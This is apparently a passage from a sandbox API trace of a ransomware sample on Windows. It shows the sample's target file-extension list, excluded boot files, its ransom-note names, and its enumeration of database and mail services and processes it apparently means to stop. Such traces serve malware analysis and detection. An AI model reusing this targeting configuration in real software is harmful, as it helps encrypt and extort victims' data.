	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x100) returned 0x7df4700
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x200) returned 0x7e08b80
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08b80, Size=0x400) returned 0x7e08b80
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08b80, Size=0x800) returned 0x7e08b80
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08b80, Size=0x1000) returned 0x7e08b80
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17900, Size=0x8) returned 0x7e17920
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17920, Size=0x10) returned 0x7e067c0
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e067c0, Size=0x20) returned 0x7df2b30
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b30, Size=0x40) returned 0x7dcffd8
	[0030.940] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcffd8, Size=0x80) returned 0x7df4700
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x100) returned 0x7df4700
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x200) returned 0x7e39bc0
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e39bc0, Size=0x400) returned 0x7e3a1c8
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e3a1c8, Size=0x800) returned 0x7e09f88
	[0030.941] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776
	[0030.941] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08b80 | out: hHeap=0x7d60000) returned 1
	[0030.941] lstrlenW (lpString="") returned 0
	[0030.941] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e0ae80 | out: hHeap=0x7d60000) returned 1
	[0030.941] lstrlenW (lpString=".bot") returned 4
	[0030.941] lstrlenW (lpString=".bot") returned 4
	[0030.941] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e0ae80 | out: hHeap=0x7d60000) returned 1
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aeb0, Size=0x20) returned 0x7df2b30
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b30, Size=0x40) returned 0x7dcffd8
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcffd8, Size=0x80) returned 0x7df4700
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17aa0, Size=0x8) returned 0x7e17ab0
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ab0, Size=0x10) returned 0x7e0aeb0
	[0030.941] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aeb0, Size=0x20) returned 0x7df2b80
	[0030.942] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48
	[0030.942] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4700 | out: hHeap=0x7d60000) returned 1
	[0030.942] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aee0, Size=0x20) returned 0x7df2ba8
	[0030.942] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2ba8, Size=0x40) returned 0x7dcffd8
	[0030.942] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0030.942] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0030.942] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcffd8 | out: hHeap=0x7d60000) returned 1
	[0030.942] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aee0, Size=0x20) returned 0x7df2ba8
	[0030.942] lstrlenW (lpString="Info.hta") returned 8
	[0030.942] lstrlenW (lpString="Info.hta") returned 8
	[0030.942] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2ba8 | out: hHeap=0x7d60000) returned 1
	[0030.942] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e3add0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe")) returned 0x33
	[0030.942] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e3add0 | out: hHeap=0x7d60000) returned 1
	[0030.942] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b80, Size=0x40) returned 0x7dcffd8
	[0030.942] lstrlenW (lpString=".exe") returned 4
	[0030.942] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aef8, Size=0x20) returned 0x7df2b80
	[0030.943] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0aef8, Size=0x20) returned 0x7df2ba8
	[0030.943] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2ba8, Size=0x40) returned 0x7dd0020
	[0030.943] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dd0020, Size=0x80) returned 0x7df4700
	[0030.943] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x100) returned 0x7df4700
	[0030.943] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.943] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4700 | out: hHeap=0x7d60000) returned 1
	[0030.943] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x7e3add0, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc
	[0030.943] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e4add8 | out: hHeap=0x7d60000) returned 1
	[0030.943] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e3add0 | out: hHeap=0x7d60000) returned 1
	[0030.943] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ab0, Size=0x8) returned 0x7e17aa0
	[0030.943] lstrlenW (lpString="%windir%;") returned 9
	[0030.943] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2b80 | out: hHeap=0x7d60000) returned 1
	[0030.943] lstrlenW (lpString="C:\\Windows;") returned 11
	[0030.943] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e297b8 | out: hHeap=0x7d60000) returned 1
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0af10, Size=0x20) returned 0x7df2b80
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2b80, Size=0x40) returned 0x7dd0020
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dd0020, Size=0x80) returned 0x7df4700
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4700, Size=0x100) returned 0x7df4700
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ae0, Size=0x8) returned 0x7e17af0
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17af0, Size=0x10) returned 0x7e0af58
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e0af58, Size=0x20) returned 0x7df2b80
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ab0, Size=0x8) returned 0x7e17af0
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ac0, Size=0x8) returned 0x7e17ab0
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ae0, Size=0x8) returned 0x7e17b00
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b00, Size=0x10) returned 0x7e08c10
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08c10, Size=0x20) returned 0x7df2ba8
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17af0, Size=0x10) returned 0x7e08c10
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17ab0, Size=0x10) returned 0x7e08c40
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17af0, Size=0x8) returned 0x7e17ae0
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b10, Size=0x8) returned 0x7e17b20
	[0030.944] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08c10, Size=0x20) returned 0x7df2bd0
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08c40, Size=0x20) returned 0x7df2bf8
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b30, Size=0x8) returned 0x7e17b40
	[0030.945] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91
	[0030.945] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4700 | out: hHeap=0x7d60000) returned 1
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08cb8, Size=0x20) returned 0x7df2c48
	[0030.945] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x7e297b8, nSize=0x7fff | out: lpDst="C:") returned 0x3
	[0030.945] lstrlenW (lpString="C:\\") returned 3
	[0030.945] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0030.945] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e297b8 | out: hHeap=0x7d60000) returned 1
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b70, Size=0x82) returned 0x7e09408
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e3a1f0, Size=0x100) returned 0x7e09498
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e09408, Size=0x104) returned 0x7e096c0
	[0030.945] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e09498, Size=0x200) returned 0x7e097d0
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e3a1e0 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e097d0 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d60 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e39cd8 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d18 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e09380 | out: hHeap=0x7d60000) returned 1
	[0030.946] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d48 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e096c0 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d30 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e095a0 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d78 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e09630 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d90 | out: hHeap=0x7d60000) returned 1
	[0030.947] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08d90, Size=0x20) returned 0x7df2c70
	[0030.947] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2c70, Size=0x40) returned 0x7dd0020
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17b50 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08cb8 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e39c48 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08ce8 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e39bc0 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08cd0 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17b60 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e08d00 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df47d8 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df1ca8 | out: hHeap=0x7d60000) returned 1
	[0030.947] lstrlenW (lpString="%systemdrive%") returned 13
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2c48 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4848 | out: hHeap=0x7d60000) returned 1
	[0030.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e17b30 | out: hHeap=0x7d60000) returned 1
	[0030.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x7e19798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110
	[0031.177] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7df44c8*=0x104, bWaitAll=1, dwMilliseconds=0xffffffff) 

Thread:
	id = 2
	os_tid = 0x944


Thread:
	id = 4
	os_tid = 0x950

	[0031.129] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08d00
	[0031.129] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08d00, Size=0x20) returned 0x7df2c70
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2c70, Size=0x40) returned 0x7dd0068
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dd0068, Size=0x80) returned 0x7e39bc0
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e39bc0, Size=0x100) returned 0x7e39bc0
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08d00
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08d00, Size=0x20) returned 0x7df2c70
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2c70, Size=0x40) returned 0x7dd0068
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dd0068, Size=0x80) returned 0x7e39cc8
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e39cc8, Size=0x100) returned 0x7e09590
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7e08d00
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7e17b30
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08cd0
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b30, Size=0x8) returned 0x7e17b60
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7df1cc8
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b60, Size=0x10) returned 0x7e08ce8
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x18) returned 0x7df1ce8
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1a) returned 0x7df2c70
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08ce8, Size=0x20) returned 0x7df2c98
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1c) returned 0x7df2cc0
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x16) returned 0x7df1d08
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1a) returned 0x7df2ce8
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7e08ce8
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7e17b60
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40) returned 0x7dd0068
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b60, Size=0x8) returned 0x7e17b30
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x3c) returned 0x7dd00b0
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e17b30, Size=0x10) returned 0x7e08cb8
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7df1d28
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x18) returned 0x7df1d48
	[0031.130] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08cb8, Size=0x20) returned 0x7df2d10
	[0031.130] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x24) returned 0x7df47d8
	[0031.130] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81
	[0031.130] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e39bc0 | out: hHeap=0x7d60000) returned 1
	[0031.130] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102
	[0031.130] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e09590 | out: hHeap=0x7d60000) returned 1
	[0031.130] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df2db0
	[0031.131] EnumServicesStatusExW (in: hSCManager=0x7df2db0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0031.131] GetLastError () returned 0xea
	[0031.131] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0x7e0dfd8
	[0031.131] EnumServicesStatusExW (in: hSCManager=0x7df2db0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e0dfd8, cbBufSize=0x11e4, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e0dfd8, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0031.132] CloseServiceHandle (hSCObject=0x7df2db0) returned 1
	[0031.132] lstrlenW (lpString="Appinfo") returned 7
	[0031.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0031.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0031.132] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0031.132] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0031.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0031.132] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0031.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0031.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0031.132] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0031.132] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0031.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0031.133] lstrlenW (lpString="AudioSrv") returned 8
	[0031.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0031.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0031.133] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0031.133] lstrlenW (lpString="BFE") returned 3
	[0031.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0031.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0031.133] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0031.133] lstrlenW (lpString="CryptSvc") returned 8
	[0031.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0031.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0031.133] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0031.133] lstrlenW (lpString="CscService") returned 10
	[0031.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0031.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0031.133] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0031.133] lstrlenW (lpString="DcomLaunch") returned 10
	[0031.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0031.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0031.133] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0031.134] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0031.134] lstrlenW (lpString="Dhcp") returned 4
	[0031.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0031.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0031.134] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0031.134] lstrlenW (lpString="Dnscache") returned 8
	[0031.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0031.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
